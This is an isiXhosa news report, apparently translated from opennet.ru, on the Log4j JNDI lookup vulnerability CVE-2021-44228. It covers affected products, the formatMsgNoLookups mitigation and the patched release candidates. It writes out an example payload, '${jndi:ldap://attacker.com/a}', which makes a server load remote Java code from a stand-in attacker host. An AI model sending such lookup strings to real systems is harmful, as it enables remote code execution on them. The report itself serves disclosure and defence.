Kwi-Apache Log4j, isakhelo esidumileyo sokuququzelela ukungena kwizicelo zeJava, ubuthathaka obubalulekileyo ichongiwe obuvumela ukuba ikhowudi engafanelekanga yenziwe xa ixabiso elifomathiweyo ngokukodwa kwifomethi ye "{jndi:URL}" ibhaliwe kwilogi. Uhlaselo lunokwenziwa kwizicelo zeJava ezigcina amaxabiso afunyenwe kwimithombo yangaphandle, umzekelo, xa ubonisa amaxabiso anengxaki kwimiyalezo yempazamo.
Kuqatshelwe ukuba phantse zonke iiprojekthi ezisebenzisa izikhokelo ezifana neApache Struts, Apache Solr, Apache Druid okanye Apache Flink zichatshazelwa yingxaki, kubandakanya iSteam, iApple iCloud, abathengi beMinecraft kunye neeseva. Kulindeleke ukuba ubuthathaka bukhokelela kuhlaselo olukhulu kwizicelo zenkampani, ukuphinda imbali yobuthathaka obubalulekileyo kwisakhelo se-Apache Struts, ethi, ngokoqikelelo olurhabaxa, isetyenziswe kwizicelo zewebhu nge-65% ye-Fortune. Iinkampani ezili-100. Kubandakanya iinzame zokuskena uthungelwano lweenkqubo ezisesichengeni.
Ingxaki yenziwa mandundu nangakumbi kukuba sele ipapashiwe i-exploit esebenzayo, kodwa ukulungiswa kwamasebe azinzileyo akukaqulunqwa. Isichongi se-CVE asikabelwa. Ukulungiswa kubandakanyiwe kuphela kwisebe lovavanyo log4j-2.15.0-rc1. Njengomsebenzi wokuthintela ukuba sesichengeni, kuyacetyiswa ukuba usete iparamitha yelog4j2.formatMsgNoLookups ibe yinyani.
Ingxaki yabangelwa kukuba i-log4j isekela ukusetyenzwa kweemaski ezikhethekileyo "{}" kwimigqaliselo ephuma kwilogi, apho imibuzo ye-JNDI (i-Java Naming kunye ne-Directory Interface) inokuphunyezwa. Uhlaselo lubilisa ekugqithiseni umtya ngokufaka endaweni “${jndi:ldap://attacker.com/a}”, xa kusenziwa ilog4j ezakuthumela isicelo seLDAP sendlela eya kwiklasi yeJava kumncedisi we attacker.com. . Indlela ebuyiswe ngumncedisi womhlaseli (umzekelo, http://second-stage.attacker.com/Exploit.class) iya kulayishwa kwaye yenziwe kumxholo wenkqubo yangoku, evumela umhlaseli ukuba enze ikhowudi engenasizathu inkqubo enamalungelo esicelo sangoku.
IsiHlomelo 1: Ukuba sesichengeni kunikwe isazisi CVE-2021-44228.
IsiHlomelo sesi-2: Indlela yokudlula ukhuseleko olongeziweyo ngokukhululwa kwelog4j-2.15.0-rc1 ichongiwe. Uhlaziyo olutsha, i-log4j-2.15.0-rc2, lucetywe ngokhuseleko olupheleleyo malunga nokuba sesichengeni. Ikhowudi igxininisa utshintsho oluhambelana nokungabikho kokupheliswa okungaqhelekanga kwimeko yokusebenzisa i-URL ye-JNDI engalunganga.
umthombo: opennet.ru